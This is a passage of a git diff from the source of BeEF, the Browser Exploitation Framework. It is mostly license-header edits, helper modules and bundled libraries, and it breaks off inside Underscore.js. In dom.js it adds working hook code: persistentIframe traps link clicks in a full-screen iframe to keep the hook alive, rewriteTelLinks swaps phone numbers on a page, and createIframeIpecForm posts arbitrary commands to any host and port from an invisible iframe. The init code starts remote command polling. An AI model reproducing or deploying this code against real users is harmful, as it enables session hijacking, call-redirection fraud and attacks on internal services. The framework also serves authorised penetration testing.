author unknown. + * + */ +beef.browser.cookie = { + + setCookie: function (name, value, expires, path, domain, secure) + { + + var today = new Date(); + today.setTime( today.getTime() ); + + if ( expires ) + { + expires = expires * 1000 * 60 * 60 * 24; + } + var expires_date = new Date( today.getTime() + (expires) ); + + document.cookie = name + "=" +escape( value ) + + ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + + ( ( path ) ? ";path=" + path : "" ) + + ( ( domain ) ? ";domain=" + domain : "" ) + + ( ( secure ) ? ";secure" : "" ); + }, + + getCookie: function(name) + { + var a_all_cookies = document.cookie.split( ';' ); + var a_temp_cookie = ''; + var cookie_name = ''; + var cookie_value = ''; + var b_cookie_found = false; + + for ( i = 0; i < a_all_cookies.length; i++ ) + { + a_temp_cookie = a_all_cookies[i].split( '=' ); + cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); + if ( cookie_name == name ) + { + b_cookie_found = true; + if ( a_temp_cookie.length > 1 ) + { + cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); + } + return cookie_value; + break; + } + a_temp_cookie = null; + cookie_name = ''; + } + if ( !b_cookie_found ) + { + return null; + } + }, + + deleteCookie: function (name, path, domain) + { + if ( this.getCookie(name) ) document.cookie = name + "=" + + ( ( path ) ? ";path=" + path : "") + + ( ( domain ) ? ";domain=" + domain : "" ) + + ";expires=Thu, 01-Jan-1970 00:00:01 GMT"; + }, + + hasSessionCookies: function (name) + { + var name = name || "cookie"; + if (name == "") name = "cookie"; + this.setCookie( name, 'none', '', '/', '', '' ); + + cookiesEnabled = (this.getCookie(name) == null)? false:true; + this.deleteCookie(name, '/', ''); + return cookiesEnabled; + + }, + + hasPersistentCookies: function (name) + { + var name = name || "cookie"; + if (name == "") name = "cookie"; + this.setCookie( name, 'none', 1, '/', '', '' ); + + cookiesEnabled = (this.getCookie(name) == null)? false:true; + this.deleteCookie(name, '/', ''); + return cookiesEnabled; + + } + +}; + beef.regCmp('beef.browser.cookie'); \ No newline at end of file diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js index bdea5eb35..0efd4aa8a 100644 --- a/core/main/client/browser/popup.js +++ b/core/main/client/browser/popup.js @@ -1,39 +1,30 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.browser.popup - * - * Provides fuctions for working with cookies. - * Several functions adopted from http://davidwalsh.name/popup-block-javascript - * Original author unknown. - * - */ -beef.browser.popup = { - - blocker_enbabled: function () - { - screenParams = beef.browser.getScreenSize(); - var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable'); - if (popUp == null || typeof(popUp)=='undefined') { - return true; - } else { - popUp.close(); - return false; - } - } -}; - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.browser.popup + * + * Provides fuctions for working with cookies. + * Several functions adopted from http://davidwalsh.name/popup-block-javascript + * Original author unknown. + * + */ +beef.browser.popup = { + + blocker_enabled: function () + { + screenParams = beef.browser.getScreenSize(); + var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable'); + if (popUp == null || typeof(popUp)=='undefined') { + return true; + } else { + popUp.close(); + return false; + } + } +}; + beef.regCmp('beef.browser.popup'); diff --git a/core/main/client/dom.js b/core/main/client/dom.js index 387b514bf..bcebc904d 100644 --- a/core/main/client/dom.js +++ b/core/main/client/dom.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.dom * @@ -117,6 +108,25 @@ beef.dom = { } return iframe; }, + + /** + * Load the link (href value) in an overlay foreground iFrame. + * The BeEF hook continues to run in background. + * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses + * Framebusting techniques, this will not work. + */ + persistentIframe: function(){ + $j('a').click(function(e) { + if ($j(this).attr('href') != '') + { + e.preventDefault(); + beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null); + $j(document).attr('title', $j(this).html()); + document.body.scroll = "no"; + document.documentElement.style.overflow = 'hidden'; + } + }); + }, /** * Create a form element with the specified parameters, appending it to the DOM if append == true @@ -194,6 +204,31 @@ beef.dom = { return count; }, + /** + * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number + * @param: {String} new_number: the new link telephone number to be written + * @param: {String} selector: the jquery selector statement to use, defaults to all a tags. + * @return: {Number} the amount of links found in the DOM and rewritten. + */ + rewriteTelLinks: function(new_number, selector) { + + var count = 0; + var re = new RegExp("tel:/?/?.*", "gi"); + var sel = (selector == null) ? 'a' : selector; + + $j(sel).each(function() { + if ($j(this).attr('href') != null) { + var url = $j(this).attr('href'); + if (url.match(re)) { + $j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; }); + count++; + } + } + }); + + return count; + }, + /** * Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}] @@ -315,6 +350,30 @@ beef.dom = { formXsrf.submit(); return iframeXsrf; + }, + + /** + * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation. + * @params: {String} rhost: remote host ip/domain + * @params: {String} rport: remote port + * @params: {String} commands: protocol commands to be executed by the remote host:port service + */ + createIframeIpecForm: function(rhost, rport, commands){ + var iframeIpec = beef.dom.createInvisibleIframe(); + + var formIpec = document.createElement('form'); + formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html'); + formIpec.setAttribute('method', 'POST'); + formIpec.setAttribute('enctype', 'multipart/form-data'); + + input = document.createElement('textarea'); + input.setAttribute('name', Math.random().toString(36).substring(5)); + input.value = commands; + formIpec.appendChild(input); + iframeIpec.contentWindow.document.body.appendChild(formIpec); + formIpec.submit(); + + return iframeIpec; } }; diff --git a/core/main/client/encode/base64.js b/core/main/client/encode/base64.js index 94246d82b..80df54fcf 100644 --- a/core/main/client/encode/base64.js +++ b/core/main/client/encode/base64.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662 beef.encode = {}; diff --git a/core/main/client/encode/json.js b/core/main/client/encode/json.js index 9a7a40c43..94fa8ba7a 100644 --- a/core/main/client/encode/json.js +++ b/core/main/client/encode/json.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/ beef.encode.json = { diff --git a/core/main/client/geolocation.js b/core/main/client/geolocation.js index 0da30c433..66cc639d6 100644 --- a/core/main/client/geolocation.js +++ b/core/main/client/geolocation.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.geolocation * diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js new file mode 100644 index 000000000..b56e30ab7 --- /dev/null +++ b/core/main/client/hardware.js @@ -0,0 +1,82 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.hardware = { + + ua: navigator.userAgent, + + isWinPhone: function() { + return (this.ua.match('(Windows Phone)')) ? true : false; + }, + + isIphone: function() { + return (this.ua.indexOf('iPhone') != -1) ? true : false; + }, + + isIpad: function() { + return (this.ua.indexOf('iPad') != -1) ? true : false; + }, + + isIpod: function() { + return (this.ua.indexOf('iPod') != -1) ? true : false; + }, + + isNokia: function() { + return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false; + }, + + isBlackBerry: function() { + return (this.ua.match('BlackBerry')) ? true : false; + }, + + isZune: function() { + return (this.ua.match('ZuneWP7')) ? true : false; + }, + + isKindle: function() { + return (this.ua.match('Kindle')) ? true : false; + }, + + isHtc: function() { + return (this.ua.match('HTC')) ? true : false; + }, + + isEricsson: function() { + return (this.ua.match('Ericsson')) ? true : false; + }, + + isNokia: function() { + return (this.ua.match('Nokia')) ? true : false; + }, + + isMotorola: function() { + return (this.ua.match('Motorola')) ? true : false; + }, + + isGoogle: function() { + return (this.ua.match('Nexus One')) ? true : false; + }, + + getName: function() { + + if (this.isNokia()) return 'Nokia'; + if (this.isWinPhone()) return 'Windows Phone'; + if (this.isBlackBerry()) return 'BlackBerry'; + if (this.isIphone()) return 'iPhone'; + if (this.isIpad()) return 'iPad'; + if (this.isIpod()) return 'iPod'; + if (this.isKindle()) return 'Kindle'; + if (this.isHtc()) return 'HTC'; + if (this.isMotorola()) return 'Motorola'; + if (this.isZune()) return 'Zune'; + if (this.isGoogle()) return 'Google'; + if (this.isEricsson()) return 'Ericsson'; + + return 'Unknown'; + } +}; + +beef.regCmp('beef.net.hardware'); diff --git a/core/main/client/init.js b/core/main/client/init.js index dfd0f9dcc..2e87606a9 100644 --- a/core/main/client/init.js +++ b/core/main/client/init.js @@ -1,23 +1,18 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // -// if beef.pageIsLoaded is true, then this JS has been loaded >1 times -// and will have a new session id. The new session id will need to know -// the brwoser details. So sendback the browser details again. - +/** + * @literal object: beef.init + * Contains the beef_init() method which starts the BeEF client-side + * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object. + * + * If beef.pageIsLoaded is true, then this JS has been loaded >1 times + * and will have a new session id. The new session id will need to know + * the brwoser details. So sendback the browser details again. + */ BEEFHOOK = beef.session.get_hook_session_id(); if (beef.pageIsLoaded) { @@ -58,6 +53,13 @@ window.onclose = function (event) { } }; +/** + * Starts the polling mechanism, and initialize various components: + * - browser details (see browser.js) are sent back to the "/init" handler + * - the polling starts (checks for new commands, and execute them) + * - the logger component is initialized (see logger.js) + * - the Autorun Engine is initialized (see are.js) + */ function beef_init() { if (!beef.pageIsLoaded) { beef.pageIsLoaded = true; @@ -66,14 +68,13 @@ function beef_init() { beef.net.browser_details(); beef.updater.execute_commands(); beef.logger.start(); - - } - else { + beef.are.init(); + }else { beef.net.browser_details(); beef.updater.execute_commands(); beef.updater.check(); beef.logger.start(); + beef.are.init(); } - } } diff --git a/core/main/client/lib/browser_jools.js b/core/main/client/lib/browser_jools.js new file mode 100644 index 000000000..9668bb23d --- /dev/null +++ b/core/main/client/lib/browser_jools.js @@ -0,0 +1,1526 @@ +var require = function (file, cwd) { + var resolved = require.resolve(file, cwd || '/'); + var mod = require.modules[resolved]; + if (!mod) throw new Error( + 'Failed to resolve module ' + file + ', tried ' + resolved + ); + var res = mod._cached ? mod._cached : mod(); + return res; +} + +require.paths = []; +require.modules = {}; +require.extensions = [".js",".coffee"]; + +require._core = { + 'assert': true, + 'events': true, + 'fs': true, + 'path': true, + 'vm': true +}; + +require.resolve = (function () { + return function (x, cwd) { + if (!cwd) cwd = '/'; + + if (require._core[x]) return x; + var path = require.modules.path(); + cwd = path.resolve('/', cwd); + var y = cwd || '/'; + + if (x.match(/^(?:\.\.?\/|\/)/)) { + var m = loadAsFileSync(path.resolve(y, x)) + || loadAsDirectorySync(path.resolve(y, x)); + if (m) return m; + } + + var n = loadNodeModulesSync(x, y); + if (n) return n; + + throw new Error("Cannot find module '" + x + "'"); + + function loadAsFileSync (x) { + if (require.modules[x]) { + return x; + } + + for (var i = 0; i < require.extensions.length; i++) { + var ext = require.extensions[i]; + if (require.modules[x + ext]) return x + ext; + } + } + + function loadAsDirectorySync (x) { + x = x.replace(/\/+$/, ''); + var pkgfile = x + '/package.json'; + if (require.modules[pkgfile]) { + var pkg = require.modules[pkgfile](); + var b = pkg.browserify; + if (typeof b === 'object' && b.main) { + var m = loadAsFileSync(path.resolve(x, b.main)); + if (m) return m; + } + else if (typeof b === 'string') { + var m = loadAsFileSync(path.resolve(x, b)); + if (m) return m; + } + else if (pkg.main) { + var m = loadAsFileSync(path.resolve(x, pkg.main)); + if (m) return m; + } + } + + return loadAsFileSync(x + '/index'); + } + + function loadNodeModulesSync (x, start) { + var dirs = nodeModulesPathsSync(start); + for (var i = 0; i < dirs.length; i++) { + var dir = dirs[i]; + var m = loadAsFileSync(dir + '/' + x); + if (m) return m; + var n = loadAsDirectorySync(dir + '/' + x); + if (n) return n; + } + + var m = loadAsFileSync(x); + if (m) return m; + } + + function nodeModulesPathsSync (start) { + var parts; + if (start === '/') parts = [ '' ]; + else parts = path.normalize(start).split('/'); + + var dirs = []; + for (var i = parts.length - 1; i >= 0; i--) { + if (parts[i] === 'node_modules') continue; + var dir = parts.slice(0, i + 1).join('/') + '/node_modules'; + dirs.push(dir); + } + + return dirs; + } + }; +})(); + +require.alias = function (from, to) { + var path = require.modules.path(); + var res = null; + try { + res = require.resolve(from + '/package.json', '/'); + } + catch (err) { + res = require.resolve(from, '/'); + } + var basedir = path.dirname(res); + + var keys = (Object.keys || function (obj) { + var res = []; + for (var key in obj) res.push(key) + return res; + })(require.modules); + + for (var i = 0; i < keys.length; i++) { + var key = keys[i]; + if (key.slice(0, basedir.length + 1) === basedir + '/') { + var f = key.slice(basedir.length); + require.modules[to + f] = require.modules[basedir + f]; + } + else if (key === basedir) { + require.modules[to] = require.modules[basedir]; + } + } +}; + +require.define = function (filename, fn) { + var dirname = require._core[filename] + ? '' + : require.modules.path().dirname(filename) + ; + + var require_ = function (file) { + return require(file, dirname) + }; + require_.resolve = function (name) { + return require.resolve(name, dirname); + }; + require_.modules = require.modules; + require_.define = require.define; + var module_ = { exports : {} }; + + require.modules[filename] = function () { + require.modules[filename]._cached = module_.exports; + fn.call( + module_.exports, + require_, + module_, + module_.exports, + dirname, + filename + ); + require.modules[filename]._cached = module_.exports; + return module_.exports; + }; +}; + +if (typeof process === 'undefined') process = {}; + +if (!process.nextTick) process.nextTick = (function () { + var queue = []; + var canPost = typeof window !== 'undefined' + && window.postMessage && window.addEventListener + ; + + if (canPost) { + window.addEventListener('message', function (ev) { + if (ev.source === window && ev.data === 'browserify-tick') { + ev.stopPropagation(); + if (queue.length > 0) { + var fn = queue.shift(); + fn(); + } + } + }, true); + } + + return function (fn) { + if (canPost) { + queue.push(fn); + window.postMessage('browserify-tick', '*'); + } + else setTimeout(fn, 0); + }; +})(); + +if (!process.title) process.title = 'browser'; + +if (!process.binding) process.binding = function (name) { + if (name === 'evals') return require('vm') + else throw new Error('No such module') +}; + +if (!process.cwd) process.cwd = function () { return '.' }; + +if (!process.env) process.env = {}; +if (!process.argv) process.argv = []; + +require.define("path", function (require, module, exports, __dirname, __filename) { +function filter (xs, fn) { + var res = []; + for (var i = 0; i < xs.length; i++) { + if (fn(xs[i], i, xs)) res.push(xs[i]); + } + return res; +} + +// resolves . and .. elements in a path array with directory names there +// must be no slashes, empty elements, or device names (c:\) in the array +// (so also no leading and trailing slashes - it does not distinguish +// relative and absolute paths) +function normalizeArray(parts, allowAboveRoot) { + // if the path tries to go above the root, `up` ends up > 0 + var up = 0; + for (var i = parts.length; i >= 0; i--) { + var last = parts[i]; + if (last == '.') { + parts.splice(i, 1); + } else if (last === '..') { + parts.splice(i, 1); + up++; + } else if (up) { + parts.splice(i, 1); + up--; + } + } + + // if the path is allowed to go above the root, restore leading ..s + if (allowAboveRoot) { + for (; up--; up) { + parts.unshift('..'); + } + } + + return parts; +} + +// Regex to split a filename into [*, dir, basename, ext] +// posix version +var splitPathRe = /^(.+\/(?!$)|\/)?((?:.+?)?(\.[^.]*)?)$/; + +// path.resolve([from ...], to) +// posix version +exports.resolve = function() { +var resolvedPath = '', + resolvedAbsolute = false; + +for (var i = arguments.length; i >= -1 && !resolvedAbsolute; i--) { + var path = (i >= 0) + ? arguments[i] + : process.cwd(); + + // Skip empty and invalid entries + if (typeof path !== 'string' || !path) { + continue; + } + + resolvedPath = path + '/' + resolvedPath; + resolvedAbsolute = path.charAt(0) === '/'; +} + +// At this point the path should be resolved to a full absolute path, but +// handle relative paths to be safe (might happen when process.cwd() fails) + +// Normalize the path +resolvedPath = normalizeArray(filter(resolvedPath.split('/'), function(p) { + return !!p; + }), !resolvedAbsolute).join('/'); + + return ((resolvedAbsolute ? '/' : '') + resolvedPath) || '.'; +}; + +// path.normalize(path) +// posix version +exports.normalize = function(path) { +var isAbsolute = path.charAt(0) === '/', + trailingSlash = path.slice(-1) === '/'; + +// Normalize the path +path = normalizeArray(filter(path.split('/'), function(p) { + return !!p; + }), !isAbsolute).join('/'); + + if (!path && !isAbsolute) { + path = '.'; + } + if (path && trailingSlash) { + path += '/'; + } + + return (isAbsolute ? '/' : '') + path; +}; + + +// posix version +exports.join = function() { + var paths = Array.prototype.slice.call(arguments, 0); + return exports.normalize(filter(paths, function(p, index) { + return p && typeof p === 'string'; + }).join('/')); +}; + + +exports.dirname = function(path) { + var dir = splitPathRe.exec(path)[1] || ''; + var isWindows = false; + if (!dir) { + // No dirname + return '.'; + } else if (dir.length === 1 || + (isWindows && dir.length <= 3 && dir.charAt(1) === ':')) { + // It is just a slash or a drive letter with a slash + return dir; + } else { + // It is a full dirname, strip trailing slash + return dir.substring(0, dir.length - 1); + } +}; + + +exports.basename = function(path, ext) { + var f = splitPathRe.exec(path)[2] || ''; + // TODO: make this comparison case-insensitive on windows? + if (ext && f.substr(-1 * ext.length) === ext) { + f = f.substr(0, f.length - ext.length); + } + return f; +}; + + +exports.extname = function(path) { + return splitPathRe.exec(path)[3] || ''; +}; + +}); + +require.define("/node_modules/jools/package.json", function (require, module, exports, __dirname, __filename) { +module.exports = {"main":"./lib/jools"} +}); + +require.define("/node_modules/jools/lib/jools.js", function (require, module, exports, __dirname, __filename) { +/** + * Module dependencies. + */ +var utils = require('./utils') + , _ = require('underscore'); + +/** + * version + */ +exports.version = '0.0.1'; + +/** + * Jools constructor. + * + * A rule consists of: + * - Descriptive name + * - One or more conditions + * - One or more consequences, which are fired when all conditions evaluate to true. + * + * @param {Object} rules + */ +function Jools(rules) { + this.rules = rules; +} + +/** + * execute rules with fact + * + * @param {Object} fact + */ +Jools.prototype.execute = function (fact) { + var self = this + , session = _.clone(fact) + , last_session = _.clone(fact) + , goal = false; + + while (!goal) { + var changes = false; + for (var x=0; x < this.rules.length; x++) { + var rule = this.rules[x] + , outcome; + + _.flatten([rule.condition]).forEach(function (cnd) { + cnd.__args = cnd.__args || utils.paramNames(cnd); + + if (outcome) { + outcome = outcome && cnd.apply({}, utils.paramsToArguments(session, cnd.__args)); + } else { + outcome = cnd.apply({}, utils.paramsToArguments(session, cnd.__args)); + } + }); + if (outcome) { + _.flatten([rule.consequence]).forEach(function (csq) { + csq.__args = csq.__args || utils.paramNames(csq); + csq.apply(session, utils.paramsToArguments(fact, csq.__args)); + if (!_.isEqual(last_session,session)) { + // Fire all rules again! + changes = true; + last_session = _.clone(session); + } + }); + } + if(changes) break; + } + if (!changes) goal = true; + } + return session; +}; + +module.exports = Jools; + + +}); + +require.define("/node_modules/jools/lib/utils.js", function (require, module, exports, __dirname, __filename) { +/** + * Returns an array of parameter names of the function f + * + * @param {Function} f + */ +module.exports.paramNames = function (f) { + var m = /function[^\(]*\(([^\)]*)\)/.exec(f.toString()); + if (!m) throw new TypeError("Invalid functions"); + + var params = []; + m[1].split(',').forEach(function (p) { + params.push(p.replace(/^\s*|\s*$/g, '')); + }); + + return params; +}; + +/** + * Creates an array of arguments + * + * @param {Object} obj + * @param {Array} params + */ +module.exports.paramsToArguments = function (obj, params) { + var args = []; + params.forEach(function (p) { + args.push(obj[p]); + }); + return args; +} + + +}); + +require.define("/node_modules/underscore/package.json", function (require, module, exports, __dirname, __filename) { +module.exports = {"main":"underscore.js"} +}); + +require.define("/node_modules/underscore/underscore.js", function (require, module, exports, __dirname, __filename) { +// Underscore.js 1.3.3 +// (c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc. +// Underscore is freely distributable under the MIT license. +// Portions of Underscore are inspired or borrowed from Prototype, +// Oliver Steele's Functional, and John Resig's Micro-Templating. +// For all details and documentation: +// http://documentcloud.github.com/underscore + +(function() { + + // Baseline setup + // -------------- + + // Establish the root object, `window` in the browser, or `global` on the server. + var root = this; + + // Save the previous value of the `_` variable. + var previousUnderscore = root._; + + // Establish the object that gets returned to break out of a loop iteration. + var breaker = {}; + + // Save bytes in the minified (but not gzipped) version: + var ArrayProto = Array.prototype, ObjProto = Object.prototype, FuncProto = Function.prototype; + + // Create quick reference variables for speed access to core prototypes. + var slice = ArrayProto.slice, + unshift = ArrayProto.unshift, + toString = ObjProto.toString, + hasOwnProperty = ObjProto.hasOwnProperty; + + // All **ECMAScript 5** native function implementations that we hope to use + // are declared here. + var + nativeForEach = ArrayProto.forEach, + nativeMap = ArrayProto.map, + nativeReduce = ArrayProto.reduce, + nativeReduceRight = ArrayProto.reduceRight, + nativeFilter = ArrayProto.filter, + nativeEvery = ArrayProto.every, + nativeSome = ArrayProto.some, + nativeIndexOf = ArrayProto.indexOf, + nativeLastIndexOf = ArrayProto.lastIndexOf, + nativeIsArray = Array.isArray, + nativeKeys = Object.keys, + nativeBind = FuncProto.bind; + + // Create a safe reference to the Underscore object for use below. + var _ = function(obj) { return new wrapper(obj); }; + + // Export the Underscore object for **Node.js**, with + // backwards-compatibility for the old `require()` API. If we're in + // the browser, add `_` as a global object via a string identifier, + // for Closure Compiler "advanced" mode. + if (typeof exports !== 'undefined') { + if (typeof module !== 'undefined' && module.exports) { + exports = module.exports = _; + } + exports._ = _; + } else { + root['_'] = _; + } + + // Current version. + _.VERSION = '1.3.3'; + + // Collection Functions + // -------------------- + + // The cornerstone, an `each` implementation, aka `forEach`. + // Handles objects with the built-in `forEach`, arrays, and raw objects. + // Delegates to **ECMAScript 5**'s native `forEach` if available. + var each = _.each = _.forEach = function(obj, iterator, context) { + if (obj == null) return; + if (nativeForEach && obj.forEach === nativeForEach) { + obj.forEach(iterator, context); + } else if (obj.length === +obj.length) { + for (var i = 0, l = obj.length; i < l; i++) { + if (i in obj && iterator.call(context, obj[i], i, obj) === breaker) return; + } + } else { + for (var key in obj) { + if (_.has(obj, key)) { + if (iterator.call(context, obj[key], key, obj) === breaker) return; + } + } + } + }; + + // Return the results of applying the iterator to each element. + // Delegates to **ECMAScript 5**'s native `map` if available. + _.map = _.collect = function(obj, iterator, context) { + var results = []; + if (obj == null) return results; + if (nativeMap && obj.map === nativeMap) return obj.map(iterator, context); + each(obj, function(value, index, list) { + results[results.length] = iterator.call(context, value, index, list); + }); + if (obj.length === +obj.length) results.length = obj.length; + return results; + }; + + // **Reduce** builds up a single result from a list of values, aka `inject`, + // or `foldl`. Delegates to **ECMAScript 5**'s native `reduce` if available. + _.reduce = _.foldl = _.inject = function(obj, iterator, memo, context) { + var initial = arguments.length > 2; + if (obj == null) obj = []; + if (nativeReduce && obj.reduce === nativeReduce) { + if (context) iterator = _.bind(iterator, context); + return initial ? obj.reduce(iterator, memo) : obj.reduce(iterator); + } + each(obj, function(value, index, list) { + if (!initial) { + memo = value; + initial = true; + } else { + memo = iterator.call(context, memo, value, index, list); + } + }); + if (!initial) throw new TypeError('Reduce of empty array with no initial value'); + return memo; + }; + + // The right-associative version of reduce, also known as `foldr`. + // Delegates to **ECMAScript 5**'s native `reduceRight` if available. + _.reduceRight = _.foldr = function(obj, iterator, memo, context) { + var initial = arguments.length > 2; + if (obj == null) obj = []; + if (nativeReduceRight && obj.reduceRight === nativeReduceRight) { + if (context) iterator = _.bind(iterator, context); + return initial ? obj.reduceRight(iterator, memo) : obj.reduceRight(iterator); + } + var reversed = _.toArray(obj).reverse(); + if (context && !initial) iterator = _.bind(iterator, context); + return initial ? _.reduce(reversed, iterator, memo, context) : _.reduce(reversed, iterator); + }; + + // Return the first value which passes a truth test. Aliased as `detect`. + _.find = _.detect = function(obj, iterator, context) { + var result; + any(obj, function(value, index, list) { + if (iterator.call(context, value, index, list)) { + result = value; + return true; + } + }); + return result; + }; + + // Return all the elements that pass a truth test. + // Delegates to **ECMAScript 5**'s native `filter` if available. + // Aliased as `select`. + _.filter = _.select = function(obj, iterator, context) { + var results = []; + if (obj == null) return results; + if (nativeFilter && obj.filter === nativeFilter) return obj.filter(iterator, context); + each(obj, function(value, index, list) { + if (iterator.call(context, value, index, list)) results[results.length] = value; + }); + return results; + }; + + // Return all the elements for which a truth test fails. + _.reject = function(obj, iterator, context) { + var results = []; + if (obj == null) return results; + each(obj, function(value, index, list) { + if (!iterator.call(context, value, index, list)) results[results.length] = value; + }); + return results; + }; + + // Determine whether all of the elements match a truth test. + // Delegates to **ECMAScript 5**'s native `every` if available. + // Aliased as `all`. + _.every = _.all = function(obj, iterator, context) { + var result = true; + if (obj == null) return result; + if (nativeEvery && obj.every === nativeEvery) return obj.every(iterator, context); + each(obj, function(value, index, list) { + if (!(result = result && iterator.call(context, value, index, list))) return breaker; + }); + return !!result; + }; + + // Determine if at least one element in the object matches a truth test. + // Delegates to **ECMAScript 5**'s native `some` if available. + // Aliased as `any`. + var any = _.some = _.any = function(obj, iterator, context) { + iterator || (iterator = _.identity); + var result = false; + if (obj == null) return result; + if (nativeSome && obj.some === nativeSome) return obj.some(iterator, context); + each(obj, function(value, index, list) { + if (result || (result = iterator.call(context, value, index, list))) return breaker; + }); + return !!result; + }; + + // Determine if a given value is included in the array or object using `===`. + // Aliased as `contains`. + _.include = _.contains = function(obj, target) { + var found = false; + if (obj == null) return found; + if (nativeIndexOf && obj.indexOf === nativeIndexOf) return obj.indexOf(target) != -1; + found = any(obj, function(value) { + return value === target; + }); + return found; + }; + + // Invoke a method (with arguments) on every item in a collection. + _.invoke = function(obj, method) { + var args = slice.call(arguments, 2); + return _.map(obj, function(value) { + return (_.isFunction(method) ? method || value : value[method]).apply(value, args); + }); + }; + + // Convenience version of a common use case of `map`: fetching a property. + _.pluck = function(obj, key) { + return _.map(obj, function(value){ return value[key]; }); + }; + + // Return the maximum element or (element-based computation). + _.max = function(obj, iterator, context) { + if (!iterator && _.isArray(obj) && obj[0] === +obj[0]) return Math.max.apply(Math, obj); + if (!iterator && _.isEmpty(obj)) return -Infinity; + var result = {computed : -Infinity}; + each(obj, function(value, index, list) { + var computed = iterator ? iterator.call(context, value, index, list) : value; + computed >= result.computed && (result = {value : value, computed : computed}); + }); + return result.value; + }; + + // Return the minimum element (or element-based computation). + _.min = function(obj, iterator, context) { + if (!iterator && _.isArray(obj) && obj[0] === +obj[0]) return Math.min.apply(Math, obj); + if (!iterator && _.isEmpty(obj)) return Infinity; + var result = {computed : 